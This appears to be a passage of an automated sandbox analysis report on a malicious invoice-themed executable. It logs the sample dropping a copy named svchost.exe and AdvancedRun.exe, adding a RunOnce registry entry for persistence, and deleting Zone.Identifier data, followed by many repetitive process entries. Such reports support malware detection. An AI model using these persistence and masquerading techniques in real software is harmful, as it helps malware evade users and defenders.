        Source: initial sampleStatic PE information: 0x8AB4D40F [Tue Sep 29 02:29:35 2043 UTC]
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,8_2_0040289F
        Source: CN-Invoice-XXXXX9808-19011143287990.exeStatic PE information: real checksum: 0x9f34 should be: 0x37eb0
        Source: svchost.exe.0.drStatic PE information: real checksum: 0x9f34 should be: 0x37eb0
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_00086302 pushfd ; retf 0_2_00086303
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_00A62684 push 8400A3C3h; ret 0_2_00A62689
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_0839CAB1 push cs; ret 0_2_0839CAA1
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_0839CA83 push cs; ret 0_2_0839CAA1
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_0040B550 push eax; ret 8_2_0040B564
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_0040B550 push eax; ret 8_2_0040B58C
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_0040B50D push ecx; ret 8_2_0040B51D
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 9_2_0040B550 push eax; ret 9_2_0040B564
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 9_2_0040B550 push eax; ret 9_2_0040B58C
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 9_2_0040B50D push ecx; ret 9_2_0040B51D

        Persistence and Installation Behavior:

        barindex
        Drops PE files with benign system namesShow sources
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeFile created: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeJump to dropped file
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\1cc51949-2752-4134-b6cf-961241419db1\AdvancedRun.exeJump to dropped file
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeFile created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeJump to dropped file
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeFile created: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeJump to dropped file
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,8_2_00401306
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce fIvxwJDVdGdMfCgtYuXwXFIxLXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce fIvxwJDVdGdMfCgtYuXwXFIxLXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce fIvxwJDVdGdMfCgtYuXwXFIxLXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce fIvxwJDVdGdMfCgtYuXwXFIxLXJump to behavior

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe:Zone.Identifier read attributes | delete
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,8_2_00408E31
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
